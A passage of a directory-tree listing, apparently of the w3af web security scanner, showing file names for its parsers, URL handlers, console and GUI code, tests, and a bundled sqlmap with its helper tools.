│ │ │ └── xml_bones.py │ │ ├── nltk_wrapper │ │ │ ├── __init__.py │ │ │ ├── nltk_wrapper.py │ │ │ └── tests │ │ │ │ └── test_nltk_wrapper.py │ │ ├── options │ │ │ ├── __init__.py │ │ │ ├── baseoption.py │ │ │ ├── bool_option.py │ │ │ ├── combo_option.py │ │ │ ├── float_option.py │ │ │ ├── form_id_list_option.py │ │ │ ├── header_option.py │ │ │ ├── input_file_option.py │ │ │ ├── integer_option.py │ │ │ ├── ip_option.py │ │ │ ├── ipport_option.py │ │ │ ├── list_option.py │ │ │ ├── opt_factory.py │ │ │ ├── option_list.py │ │ │ ├── option_types.py │ │ │ ├── output_file_option.py │ │ │ ├── port_option.py │ │ │ ├── positive_integer_option.py │ │ │ ├── preferences.py │ │ │ ├── query_string_option.py │ │ │ ├── regex_option.py │ │ │ ├── string_option.py │ │ │ ├── tests │ │ │ │ ├── test.txt │ │ │ │ ├── test_form_id_list_option.py │ │ │ │ ├── test_header_option.py │ │ │ │ ├── test_input_file_option.py │ │ │ │ ├── test_opt_factory.py │ │ │ │ └── test_query_string_option.py │ │ │ ├── url_list_option.py │ │ │ └── url_option.py │ │ ├── parsers │ │ │ ├── __init__.py │ │ │ ├── doc │ │ │ │ ├── __init__.py │ │ │ │ ├── baseparser.py │ │ │ │ ├── cookie_parser.py │ │ │ │ ├── html.py │ │ │ │ ├── http_request_parser.py │ │ │ │ ├── http_response_parser.py │ │ │ │ ├── javascript.py │ │ │ │ ├── open_api │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── construct_request.py │ │ │ │ │ ├── main.py │ │ │ │ │ ├── operation_mp.py │ │ │ │ │ ├── parameters.py │ │ │ │ │ ├── relaxed_spec.py │ │ │ │ │ ├── requests.py │ │ │ │ │ ├── specification.py │ │ │ │ │ └── tests │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── data │ │ │ │ │ │ ├── 210-openapi.yaml │ │ │ │ │ │ ├── array_int_items_qs.json │ │ │ │ │ │ ├── array_model_items_json.json │ │ │ │ │ │ ├── array_string_items_qs.json │ │ │ │ │ │ ├── complex_dereferenced_nested_model.json │ │ │ │ │ │ ├── custom_content_type.json │ │ │ │ │ │ ├── dereferenced_pet_store.json │ │ │ │ │ │ ├── int_param_json.json │ │ │ │ │ │ ├── int_param_no_model_json.json │ │ │ │ │ │ ├── int_param_qs.json │ │ │ │ │ │ ├── int_param_with_example_json.json │ │ │ │ │ │ ├── invalid-token-path.json │ │ │ │ │ │ ├── large_many_endpoints.json │ │ │ │ │ │ ├── missing_license.json │ │ │ │ │ │ ├── multiple_paths_and_headers.json │ │ │ │ │ │ ├── nested_loop_model.json │ │ │ │ │ │ ├── nested_model.json │ │ │ │ │ │ ├── not_quite_valid_petstore_simple.json │ │ │ │ │ │ ├── petstore-expanded.yaml │ │ │ │ │ │ ├── petstore-simple.json │ │ │ │ │ │ ├── real.yaml │ │ │ │ │ │ ├── simple.json │ │ │ │ │ │ ├── string_param_header.json │ │ │ │ │ │ ├── string_param_json.json │ │ │ │ │ │ ├── string_param_qs.json │ │ │ │ │ │ ├── swagger.json │ │ │ │ │ │ └── unknown_content_type.json │ │ │ │ │ │ ├── example_specifications.py │ │ │ │ │ │ ├── parse_file.py │ │ │ │ │ │ ├── test_fuzzing.py │ │ │ │ │ │ ├── test_main.py │ │ │ │ │ │ ├── test_requests.py │ │ │ │ │ │ └── test_specification.py │ │ │ │ ├── pdf.py │ │ │ │ ├── sgml.py │ │ │ │ ├── swf.py │ │ │ │ ├── tests │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── data │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── complex-form.html │ │ │ │ │ │ ├── constants.py │ │ │ │ │ │ ├── huge.html │ │ │ │ │ │ ├── links.pdf │ │ │ │ │ │ ├── pickle-8748.htm │ │ │ │ │ │ ├── se.html │ │ │ │ │ │ ├── sharepoint-pl.html │ │ │ │ │ │ ├── simple.pdf │ │ │ │ │ │ ├── subscribe.bytecode │ │ │ │ │ │ ├── subscribe.flr │ │ │ │ │ │ ├── subscribe.swf │ │ │ │ │ │ ├── test-5925-1.swf │ │ │ │ │ │ ├── test-5925-2.swf │ │ │ │ │ │ ├── uncompress-swf.py │ │ │ │ │ │ ├── wivet1.bytecode │ │ │ │ │ │ ├── wivet1.flr │ │ │ │ │ │ └── wivet1.swf │ │ │ │ │ ├── generate_html_file.py │ │ │ │ │ ├── test_baseparser.py │ │ │ │ │ ├── test_complex_html_form.py │ │ │ │ │ ├── test_cookie_parser.py │ │ │ │ │ ├── test_html.py │ │ │ │ │ ├── test_htmlparser_performance.py │ │ │ │ │ ├── test_http_request_parser.py │ │ │ │ │ ├── test_javascript.py │ │ │ │ │ ├── test_pdf.py │ │ │ │ │ ├── test_sgml.py │ │ │ │ │ ├── test_swf.py │ │ │ │ │ ├── test_url.py │ │ │ │ │ ├── test_wml_parser.py │ │ │ │ │ └── test_xmlrpc.py │ │ │ │ ├── url.py │ │ │ │ ├── wml_parser.py │ │ │ │ ├── wsdl.py │ │ │ │ └── xmlrpc.py │ │ │ ├── document_parser.py │ │ │ ├── ipc │ │ │ │ ├── __init__.py │ │ │ │ └── serialization.py │ │ │ ├── mp_document_parser.py │ │ │ ├── parser_cache.py │ │ │ ├── pynarcissus │ │ │ │ ├── __init__.py │ │ │ │ ├── jsparser.py │ │ │ │ ├── link_extractor.py │ │ │ │ ├── string_extractor.py │ │ │ │ └── tests │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── data │ │ │ │ │ ├── angular.js │ │ │ │ │ ├── jquery.js │ │ │ │ │ ├── test_1.js │ │ │ │ │ ├── test_2.js │ │ │ │ │ ├── test_3.js │ │ │ │ │ ├── test_4.js │ │ │ │ │ └── test_full_url.js │ │ │ │ │ ├── test_link_extractor.py │ │ │ │ │ └── test_string_extractor.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── test_document_parser.py │ │ │ │ ├── test_mp_document_parser.py │ │ │ │ └── test_parser_cache.py │ │ │ └── utils │ │ │ │ ├── __init__.py │ │ │ │ ├── cache_stats.py │ │ │ │ ├── encode_decode.py │ │ │ │ ├── form_constants.py │ │ │ │ ├── form_fields.py │ │ │ │ ├── form_id.py │ │ │ │ ├── form_id_matcher.py │ │ │ │ ├── form_id_matcher_list.py │ │ │ │ ├── form_params.py │ │ │ │ ├── header_link_extract.py │ │ │ │ ├── re_extract.py │ │ │ │ ├── response_uniq_id.py │ │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── test_encode_decode.py │ │ │ │ ├── test_form_id.py │ │ │ │ ├── test_form_id_matcher.py │ │ │ │ ├── test_form_params.py │ │ │ │ ├── test_header_link_extract.py │ │ │ │ ├── test_re_extract.py │ │ │ │ └── test_url_regex.py │ │ │ │ └── url_regex.py │ │ ├── profile │ │ │ ├── __init__.py │ │ │ ├── profile.py │ │ │ └── tests │ │ │ │ ├── __init__.py │ │ │ │ └── test_profile.py │ │ ├── quick_match │ │ │ ├── __init__.py │ │ │ ├── multi_in.py │ │ │ ├── multi_re.py │ │ │ └── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── test_acora_vs_esm.py │ │ │ │ ├── test_data.py │ │ │ │ ├── test_multi_in.py │ │ │ │ └── test_multire.py │ │ ├── request │ │ │ ├── __init__.py │ │ │ ├── empty_request.py │ │ │ ├── factory.py │ │ │ ├── fuzzable_request.py │ │ │ ├── request_mixin.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── test_create_fuzzable_request.py │ │ │ │ ├── test_empty_request.py │ │ │ │ ├── test_fuzzable_request.py │ │ │ │ └── test_variant_identification.py │ │ │ └── variant_identification.py │ │ ├── search_engines │ │ │ ├── __init__.py │ │ │ ├── bing.py │ │ │ ├── google.py │ │ │ ├── pks.py │ │ │ ├── search_engine.py │ │ │ └── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── test_bing.py │ │ │ │ ├── test_google.py │ │ │ │ └── test_pks.py │ │ ├── serialization │ │ │ ├── __init__.py │ │ │ └── detect.py │ │ ├── statistics │ │ │ ├── __init__.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ └── test_utils.py │ │ │ └── utils.py │ │ ├── url │ │ │ ├── HTTPRequest.py │ │ │ ├── HTTPResponse.py │ │ │ ├── __init__.py │ │ │ ├── constants.py │ │ │ ├── director.py │ │ │ ├── extended_urllib.py │ │ │ ├── get_average_rtt.py │ │ │ ├── handlers │ │ │ │ ├── __init__.py │ │ │ │ ├── blacklist.py │ │ │ │ ├── cache.py │ │ │ │ ├── cache_backend │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── cached_response.py │ │ │ │ │ ├── db.py │ │ │ │ │ ├── disk.py │ │ │ │ │ ├── settings.py │ │ │ │ │ └── utils.py │ │ │ │ ├── cert_auth.py │ │ │ │ ├── cookie_handler.py │ │ │ │ ├── errors.py │ │ │ │ ├── fast_basic_auth.py │ │ │ │ ├── gzip_handler.py │ │ │ │ ├── keepalive │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── connection_manager.py │ │ │ │ │ ├── connections.py │ │ │ │ │ ├── handler.py │ │ │ │ │ ├── http_response.py │ │ │ │ │ └── utils.py │ │ │ │ ├── mangle.py │ │ │ │ ├── normalize.py │ │ │ │ ├── ntlm_auth.py │ │ │ │ ├── output_manager.py │ │ │ │ ├── redirect.py │ │ │ │ ├── tests │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── test_blacklist.py │ │ │ │ │ ├── test_cache.py │ │ │ │ │ ├── test_cookie_handler.py │ │ │ │ │ ├── test_errors.py │ │ │ │ │ ├── test_keepalive.py │ │ │ │ │ ├── test_mangle.py │ │ │ │ │ ├── test_multipart.py │ │ │ │ │ ├── test_ntlm_auth.py │ │ │ │ │ ├── test_redirect.py │ │ │ │ │ └── test_url_parameter.py │ │ │ │ └── url_parameter.py │ │ │ ├── helpers.py │ │ │ ├── opener_settings.py │ │ │ ├── openssl_wrapper │ │ │ │ ├── __init__.py │ │ │ │ ├── ssl_wrapper.py │ │ │ │ └── tests │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── test_ssl_wrapper.py │ │ │ ├── response_meta.py │ │ │ ├── tests │ │ │ │ ├── __init__.py │ │ │ │ ├── data │ │ │ │ │ └── encoding_4402.php │ │ │ │ ├── helpers │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── http_daemon.py │ │ │ │ │ ├── ssl_daemon.py │ │ │ │ │ ├── tests │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── test_http_daemon.py │ │ │ │ │ │ ├── test_ssl_daemon.py │ │ │ │ │ │ └── test_upper_daemon.py │ │ │ │ │ ├── unittest.crt │ │ │ │ │ ├── unittest.key │ │ │ │ │ └── upper_daemon.py │ │ │ │ ├── test_HTTPRequest.py │ │ │ │ ├── test_HTTPResponse.py │ │ │ │ ├── test_get_average_rtt.py │ │ │ │ ├── test_get_clean_body.py │ │ │ │ ├── test_opener_settings.py │ │ │ │ ├── test_xurllib.py │ │ │ │ ├── test_xurllib_error_handling.py │ │ │ │ ├── test_xurllib_integration.py │ │ │ │ ├── test_xurllib_proxy.py │ │ │ │ └── test_xurllib_timeout.py │ │ │ └── time_analysis.py │ │ ├── user_agent │ │ │ ├── __init__.py │ │ │ ├── random_user_agent.py │ │ │ ├── tests │ │ │ │ └── test_random_user_agent.py │ │ │ └── user-agent-list.txt │ │ └── visualization │ │ │ ├── __init__.py │ │ │ ├── string_representation.py │ │ │ └── tests │ │ │ └── test_string_representation.py │ └── ui │ │ ├── __init__.py │ │ ├── api │ │ ├── __init__.py │ │ ├── db │ │ │ ├── __init__.py │ │ │ └── master.py │ │ ├── main.py │ │ ├── middlewares │ │ │ ├── __init__.py │ │ │ ├── require_json.py │ │ │ └── security_headers.py │ │ ├── resources │ │ │ ├── __init__.py │ │ │ ├── error_handlers.py │ │ │ ├── exceptions.py │ │ │ ├── fuzzable_requests.py │ │ │ ├── index.py │ │ │ ├── kb.py │ │ │ ├── log.py │ │ │ ├── scans.py │ │ │ ├── traffic.py │ │ │ ├── urls.py │ │ │ └── version.py │ │ ├── tests │ │ │ ├── __init__.py │ │ │ ├── test_auth.py │ │ │ ├── test_exceptions.py │ │ │ ├── test_fuzzable_requests.py │ │ │ ├── test_integration_scan.py │ │ │ ├── test_kb.py │ │ │ ├── test_log.py │ │ │ ├── test_require_json.py │ │ │ ├── test_urls.py │ │ │ ├── test_version.py │ │ │ └── utils │ │ │ │ ├── __init__.py │ │ │ │ ├── api_process.py │ │ │ │ ├── api_unittest.py │ │ │ │ ├── integration_test.py │ │ │ │ └── test_profile.py │ │ └── utils │ │ │ ├── __init__.py │ │ │ ├── auth.py │ │ │ ├── cli.py │ │ │ ├── digital_certificate.py │ │ │ ├── error.py │ │ │ ├── log_handler.py │ │ │ ├── mp_flask.py │ │ │ └── scans.py │ │ ├── console │ │ ├── __init__.py │ │ ├── auto_update │ │ │ ├── __init__.py │ │ │ └── auto_update.py │ │ ├── bug_report.py │ │ ├── callbackMenu.py │ │ ├── config.py │ │ ├── console_ui.py │ │ ├── exitmessages.txt │ │ ├── exploit.py │ │ ├── help.py │ │ ├── help.xml │ │ ├── history.py │ │ ├── io │ │ │ ├── __init__.py │ │ │ ├── common.py │ │ │ ├── console.py │ │ │ ├── unixctrl.py │ │ │ └── winctrl.py │ │ ├── kbMenu.py │ │ ├── menu.py │ │ ├── plugins.py │ │ ├── profiles.py │ │ ├── rootMenu.py │ │ ├── tables.py │ │ ├── tests │ │ │ ├── __init__.py │ │ │ ├── data │ │ │ │ └── spider_long.w3af │ │ │ ├── helper.py │ │ │ ├── test_accept_disclaimer.py │ │ │ ├── test_basic.py │ │ │ ├── test_bug_report.py │ │ │ ├── test_ctrl_c.py │ │ │ ├── test_exploit.py │ │ │ ├── test_kb_add.py │ │ │ ├── test_profiles.py │ │ │ ├── test_save.py │ │ │ ├── test_scan_run.py │ │ │ ├── test_w3af_console.py │ │ │ └── test_wrapped_w3af.py │ │ └── util.py │ │ ├── gui │ │ ├── __init__.py │ │ ├── auto_update │ │ │ ├── __init__.py │ │ │ └── gui_updater.py │ │ ├── clusterGraph.py │ │ ├── clusterTable.py │ │ ├── common │ │ │ ├── __init__.py │ │ │ └── searchable.py │ │ ├── comparator │ │ │ ├── __init__.py │ │ │ ├── comparator.py │ │ │ ├── diffutil.py │ │ │ ├── pixmaps │ │ │ │ ├── button_apply0.xpm │ │ │ │ ├── button_apply1.xpm │ │ │ │ ├── button_copy0.xpm │ │ │ │ ├── button_copy1.xpm │ │ │ │ └── button_delete.xpm │ │ │ └── readme.txt │ │ ├── compare.py │ │ ├── confpanel.py │ │ ├── constants.py │ │ ├── data │ │ │ ├── cluster_data.png │ │ │ ├── icons │ │ │ │ └── 16 │ │ │ │ │ └── gtk-execute.png │ │ │ ├── information.png │ │ │ ├── missing-image.png │ │ │ ├── request-body.png │ │ │ ├── request-headers.png │ │ │ ├── response-body.png │ │ │ ├── response-headers.png │ │ │ ├── shell.png │ │ │ ├── splash.png │ │ │ ├── throbber_animat.gif │ │ │ ├── throbber_static.gif │ │ │ ├── vulnerability.png │ │ │ ├── vulnerability_h.png │ │ │ ├── vulnerability_l.png │ │ │ ├── vulnerability_m.png │ │ │ ├── w3af_gtkrc │ │ │ ├── w3af_icon.png │ │ │ ├── w3af_logo.png │ │ │ ├── w3af_logo.svg │ │ │ ├── warning-black-animated.gif │ │ │ └── wizard_frame.png │ │ ├── dependency_check │ │ │ ├── __init__.py │ │ │ └── dependency_check.py │ │ ├── disclaimer.py │ │ ├── entries.py │ │ ├── exception_handling │ │ │ ├── __init__.py │ │ │ ├── common_windows.py │ │ │ ├── handled.py │ │ │ ├── handled_bug_report.py │ │ │ ├── tests │ │ │ │ └── test_unhandled.py │ │ │ ├── unhandled.py │ │ │ ├── unhandled_bug_report.py │ │ │ └── user_reports_bug.py │ │ ├── export_request.py │ │ ├── guardian.py │ │ ├── helpers.py │ │ ├── history.py │ │ ├── http.lang │ │ ├── httpLogTab.py │ │ ├── httpeditor.py │ │ ├── kb │ │ │ ├── __init__.py │ │ │ ├── kb_add_wizard.py │ │ │ └── kbtree.py │ │ ├── main.py │ │ ├── misc │ │ │ ├── __init__.py │ │ │ ├── text_wrap_label.py │ │ │ └── xdot_wrapper.py │ │ ├── output │ │ │ ├── __init__.py │ │ │ ├── gtk_output.py │ │ │ ├── message_consumer.py │ │ │ └── tests │ │ │ │ └── test_gtk_output.py │ │ ├── payload_generators.py │ │ ├── pluginEditor.py │ │ ├── pluginEditorDialogs.py │ │ ├── pluginconfig.py │ │ ├── profiles.py │ │ ├── prompt.py │ │ ├── reqResViewer.py │ │ ├── rrviews │ │ │ ├── __init__.py │ │ │ ├── headers.py │ │ │ ├── raw.py │ │ │ └── rendering.py │ │ ├── scanrun.py │ │ ├── speed │ │ │ ├── __init__.py │ │ │ ├── arrow.png │ │ │ ├── speedometer.png │ │ │ └── speedometer.py │ │ ├── splash.py │ │ ├── tabs │ │ │ ├── __init__.py │ │ │ ├── exploit │ │ │ │ ├── __init__.py │ │ │ │ ├── exploit_all.py │ │ │ │ ├── exploits.py │ │ │ │ ├── main_body.py │ │ │ │ ├── proxy.py │ │ │ │ ├── shell.py │ │ │ │ ├── utils.py │ │ │ │ ├── vuln_add.py │ │ │ │ └── vuln_list.py │ │ │ └── log │ │ │ │ ├── __init__.py │ │ │ │ ├── graph.py │ │ │ │ ├── main_body.py │ │ │ │ ├── messages.py │ │ │ │ └── stats.py │ │ ├── tests │ │ │ ├── __init__.py │ │ │ └── test_history.py │ │ ├── tools │ │ │ ├── __init__.py │ │ │ ├── encdec.py │ │ │ ├── fuzzy_requests.py │ │ │ ├── helpers │ │ │ │ ├── __init__.py │ │ │ │ ├── fuzzygen.py │ │ │ │ └── threaded_impact.py │ │ │ ├── manual_requests.py │ │ │ └── proxywin.py │ │ ├── user_help │ │ │ ├── __init__.py │ │ │ └── open_help.py │ │ └── wizard.py │ │ └── tests │ │ ├── __init__.py │ │ ├── gui │ │ ├── __init__.py │ │ ├── auto_update │ │ │ ├── __init__.py │ │ │ └── test_auto_update.py │ │ ├── disclaimer_accept │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ ├── accept_terms_conditions.png │ │ │ │ ├── simple_no.png │ │ │ │ ├── simple_yes.png │ │ │ │ └── xpresser.ini │ │ │ └── test_disclaimer_accept.py │ │ ├── encode_decode │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ ├── bottom_text_input.png │ │ │ │ ├── decode.png │ │ │ │ ├── decode_hola_mundo_result.png │ │ │ │ ├── drop_down.png │ │ │ │ ├── encode.png │ │ │ │ ├── encode_me_result.png │ │ │ │ ├── md5_for_encode-me.png │ │ │ │ ├── md5_hash.png │ │ │ │ ├── top_text_input.png │ │ │ │ └── xpresser.ini │ │ │ └── test_encode_decode.py │ │ ├── exploit │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ ├── audit_plugin_checkbox.png │ │ │ │ ├── context_menu_exploit_until_first.png │ │ │ │ ├── exploit_tab.png │ │ │ │ ├── generated_shell.png │ │ │ │ ├── log_tab_enabled.png │ │ │ │ ├── multiple_exploit.png │ │ │ │ ├── ok.png │ │ │ │ ├── shell_inst.png │ │ │ │ ├── shell_window_title.png │ │ │ │ ├── sql_mysql.png │ │ │ │ ├── sqlmap.png │ │ │ │ └── wordpress.png │ │ │ └── test_exploit.py │ │ ├── exploit_from_template │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ ├── add.png │ │ │ │ ├── add_new_vuln.png │ │ │ │ ├── add_new_vuln_title.png │ │ │ │ ├── close.png │ │ │ │ ├── data.png │ │ │ │ ├── exploit_all.png │ │ │ │ ├── multiple_exploit.png │ │ │ │ ├── ok.png │ │ │ │ ├── os_commanding_combo.png │ │ │ │ ├── os_commanding_exploit.png │ │ │ │ ├── os_commanding_shell.png │ │ │ │ ├── shell_window_title.png │ │ │ │ ├── store_in_kb.png │ │ │ │ ├── target_url.png │ │ │ │ ├── vuln_params_title.png │ │ │ │ ├── vulnerable_parameter.png │ │ │ │ └── xpresser.ini │ │ │ └── test_exploit_from_template.py │ │ ├── export_request │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ ├── drop_down_export.png │ │ │ │ ├── export.png │ │ │ │ ├── http_request_text.png │ │ │ │ ├── python_code.png │ │ │ │ ├── python_export.png │ │ │ │ └── save_request_as.png │ │ │ └── test_export_request.py │ │ ├── fuzzy_request_editor │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ ├── 200_OK.png │ │ │ │ ├── abcdef.png │ │ │ │ ├── error.png │ │ │ │ ├── localhost.png │ │ │ │ ├── play.png │ │ │ │ ├── response_tab.png │ │ │ │ ├── send-disabled.png │ │ │ │ └── xpresser.ini │ │ │ └── test_fuzzy_request_editor.py │ │ ├── invalid_target_url │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ ├── invalid_url.png │ │ │ │ └── no_audit_grep_plugins.png │ │ │ └── test_invalid_url.py │ │ ├── main_window │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ ├── audit_plugin_type.png │ │ │ │ ├── audit_plugin_type_text.png │ │ │ │ ├── bug_detected.png │ │ │ │ ├── clear_icon.png │ │ │ │ ├── eval_plugin.png │ │ │ │ ├── exploit_list.png │ │ │ │ ├── exploit_tab.png │ │ │ │ ├── insert_target_url_here.png │ │ │ │ ├── log_tab.png │ │ │ │ ├── main-window-cross-close.png │ │ │ │ ├── main-window-menu-2.png │ │ │ │ ├── main-window-menu.png │ │ │ │ ├── main-window-title.png │ │ │ │ ├── new_profile.png │ │ │ │ ├── ok.png │ │ │ │ ├── output_plugin_list.png │ │ │ │ ├── output_plugin_type_text.png │ │ │ │ ├── owasp_top_10_profile.png │ │ │ │ ├── results_tab.png │ │ │ │ ├── scan_not_started.png │ │ │ │ ├── scan_start.png │ │ │ │ ├── throbber_stopped.png │ │ │ │ ├── xpresser.ini │ │ │ │ └── yes.png │ │ │ └── test_main_window.py │ │ ├── manual_requests │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ ├── 200_OK.png │ │ │ │ ├── abcdef.png │ │ │ │ ├── localhost.png │ │ │ │ ├── send.png │ │ │ │ ├── send_disabled.png │ │ │ │ └── stopped_sending_requests.png │ │ │ └── test_manual_requests.py │ │ ├── new_profile │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ ├── bold_test_profile.png │ │ │ │ ├── context_menu_profile_delete.png │ │ │ │ ├── profile_desc_in_label.png │ │ │ │ ├── profile_description.png │ │ │ │ ├── profile_disabled_all.png │ │ │ │ ├── profile_disabled_output.png │ │ │ │ ├── profile_name.png │ │ │ │ ├── profile_new_dlg_button.png │ │ │ │ ├── profile_save.png │ │ │ │ ├── scan_config.png │ │ │ │ ├── test_profile.png │ │ │ │ ├── test_profile_selected.png │ │ │ │ └── xpresser.ini │ │ │ └── test_new_profile.py │ │ ├── no_plugins_scan │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ └── no_plugins.png │ │ │ └── test_no_plugins_scan.py │ │ ├── profile_loading │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ ├── audit_plugins_enabled.png │ │ │ │ ├── empty_profile.png │ │ │ │ ├── no_plugins_enabled.png │ │ │ │ └── owasp_top_10.png │ │ │ └── test_profile_loading.py │ │ ├── proxy │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ ├── 200_OK.png │ │ │ │ ├── GET_http.png │ │ │ │ ├── empty_intercept.png │ │ │ │ ├── intercept.png │ │ │ │ ├── next_request.png │ │ │ │ ├── send-request.png │ │ │ │ └── xpersser.ini │ │ │ └── test_proxy.py │ │ ├── request_help │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ └── configuring_the_scan_fragment.png │ │ │ └── test_request_help.py │ │ ├── scan_offline_url │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ ├── connection_refused.png │ │ │ │ └── log_tab_enabled.png │ │ │ └── test_scan_offline_url.py │ │ ├── tools_menu │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ │ ├── all-menu.png │ │ │ │ ├── close-with-cross.png │ │ │ │ ├── compare-icon.png │ │ │ │ ├── compare-window-title.png │ │ │ │ ├── encode-decode-decode-url.png │ │ │ │ ├── encode-decode-encode-url.png │ │ │ │ ├── encode-decode-icon.png │ │ │ │ ├── encode-decode-window-title.png │ │ │ │ ├── export-http-export-html.png │ │ │ │ ├── export-http-icon.png │ │ │ │ ├── export-http-window-title.png │ │ │ │ ├── fuzzy-requests-icon.png │ │ │ │ ├── fuzzy-requests-tabs.png │ │ │ │ ├── fuzzy-requests-window-title.png │ │ │ │ ├── manual-request-request-response.png │ │ │ │ ├── manual-request.png │ │ │ │ ├── manual-requests-window-title.png │ │ │ │ ├── proxy-menu-icon.png │ │ │ │ ├── proxy-tabs.png │ │ │ │ ├── proxy-window-title.png │ │ │ │ ├── xpresser.ini │ │ │ │ └── yes.png │ │ │ └── test_click_menu.py │ │ └── two_scans │ │ │ ├── __init__.py │ │ │ ├── images │ │ │ ├── audit_gray_background.png │ │ │ ├── previous_target.png │ │ │ └── start.png │ │ │ └── test_two_scans.py │ │ ├── test_fuzzygen.py │ │ └── wrappers │ │ ├── __init__.py │ │ ├── constants.py │ │ ├── gnome.py │ │ ├── gnome.xinitrc │ │ ├── tests │ │ ├── __init__.py │ │ ├── helloworld.py │ │ ├── test_xvfb_server.py │ │ └── utils.py │ │ ├── utils.py │ │ ├── xpresser_unittest.py │ │ └── xvfb_server.py ├── locales │ ├── es │ │ └── LC_MESSAGES │ │ │ ├── w3af.mo │ │ │ └── w3af.po │ └── ru │ │ └── LC_MESSAGES │ │ ├── w3af.mo │ │ └── w3af.po ├── plugins │ ├── __init__.py │ ├── attack │ │ ├── __init__.py │ │ ├── dav.py │ │ ├── db │ │ │ ├── __init__.py │ │ │ ├── sqlmap │ │ │ │ ├── .gitattributes │ │ │ │ ├── .github │ │ │ │ │ ├── CODE_OF_CONDUCT.md │ │ │ │ │ ├── CONTRIBUTING.md │ │ │ │ │ └── ISSUE_TEMPLATE.md │ │ │ │ ├── .gitignore │ │ │ │ ├── .travis.yml │ │ │ │ ├── LICENSE │ │ │ │ ├── README.md │ │ │ │ ├── doc │ │ │ │ │ ├── AUTHORS │ │ │ │ │ ├── CHANGELOG.md │ │ │ │ │ ├── FAQ.pdf │ │ │ │ │ ├── README.pdf │ │ │ │ │ ├── THANKS.md │ │ │ │ │ ├── THIRD-PARTY.md │ │ │ │ │ └── translations │ │ │ │ │ │ ├── README-bg-BG.md │ │ │ │ │ │ ├── README-es-MX.md │ │ │ │ │ │ ├── README-fr-FR.md │ │ │ │ │ │ ├── README-gr-GR.md │ │ │ │ │ │ ├── README-hr-HR.md │ │ │ │ │ │ ├── README-id-ID.md │ │ │ │ │ │ ├── README-it-IT.md │ │ │ │ │ │ ├── README-ja-JP.md │ │ │ │ │ │ ├── README-pl-PL.md │ │ │ │ │ │ ├── README-pt-BR.md │ │ │ │ │ │ ├── README-tr-TR.md │ │ │ │ │ │ └── README-zh-CN.md │ │ │ │ ├── extra │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── beep │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── beep.py │ │ │ │ │ │ └── beep.wav │ │ │ │ │ ├── cloak │ │ │ │ │ │ ├── README.txt │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── cloak.py │ │ │ │ │ ├── dbgtool │ │ │ │ │ │ ├── README.txt │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── dbgtool.py │ │ │ │ │ ├── icmpsh │ │ │ │ │ │ ├── README.txt │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── icmpsh-m.c │ │ │ │ │ │ ├── icmpsh-m.pl │ │ │ │ │ │ ├── icmpsh-s.c │ │ │ │ │ │ ├── icmpsh.exe_ │ │ │ │ │ │ └── icmpsh_m.py │ │ │ │ │ ├── mssqlsig │ │ │ │ │ │ └── update.py │ │ │ │ │ ├── runcmd │ │ │ │ │ │ ├── README.txt │ │ │ │ │ │ ├── runcmd.exe_ │ │ │ │ │ │ └── src │ │ │ │ │ │ │ ├── README.txt │ │ │ │ │ │ │ ├── runcmd.sln │ │ │ │ │ │ │ └── runcmd │ │ │ │ │ │ │ ├── runcmd.cpp │ │ │ │ │ │ │ ├── runcmd.vcproj │ │ │ │ │ │ │ ├── stdafx.cpp │ │ │ │ │ │ │ └── stdafx.h │ │ │ │ │ ├── safe2bin │ │ │ │ │ │ ├── README.txt │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── safe2bin.py │ │ │ │ │ ├── shellcodeexec │ │ │ │ │ │ ├── README.txt │ │ │ │ │ │ ├── linux │ │ │ │ │ │ │ ├── shellcodeexec.x32_ │ │ │ │ │ │ │ └── shellcodeexec.x64_ │ │ │ │ │ │ └── windows │ │ │ │ │ │ │ └── shellcodeexec.x32.exe_ │ │ │ │ │ ├── shutils │ │ │ │ │ │ ├── blanks.sh │ │ │ │ │ │ ├── duplicates.py │ │ │ │ │ │ ├── pep8.sh │ │ │ │ │ │ ├── postcommit-hook.sh │ │ │ │ │ │ ├── precommit-hook.sh │ │ │ │ │ │ ├── pydiatra.sh │ │ │ │ │ │ ├── pyflakes.sh │ │ │ │ │ │ ├── pylint.py │ │ │ │ │ │ ├── pypi.sh │ │ │ │ │ │ ├── regressiontest.py │ │ │ │ │ │ └── strip.sh │ │ │ │ │ └── sqlharvest │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ └── sqlharvest.py 